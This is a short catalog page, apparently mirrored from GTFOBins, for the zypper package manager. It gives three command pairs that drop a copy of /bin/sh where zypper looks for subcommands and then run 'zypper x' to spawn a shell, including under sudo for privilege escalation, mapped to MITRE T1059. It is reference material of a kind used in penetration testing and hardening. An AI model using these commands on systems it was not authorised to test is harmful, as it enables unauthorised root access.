Catalog GTFOBins

GTFO · Tool

zypper

4 techniques Linux · macOSGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation LinuxmacOS

The copy usually requires elevated privileges.

cp /bin/sh /usr/lib/zypper/commands/zypper-x
zypper x
Context
sudo
Native
shell
MITRE
T1059

shell

Execution LinuxmacOS

The copy usually requires elevated privileges.

cp /bin/sh /usr/lib/zypper/commands/zypper-x
zypper x
Context
unprivileged
Native
shell
MITRE
T1059

shell

ExecutionPrivilege Escalation LinuxmacOS
cp /bin/sh /path/to/temp-dir/zypper-x
PATH=$PATH:/path/to/temp-dir/ zypper x
Context
sudo
Native
shell
MITRE
T1059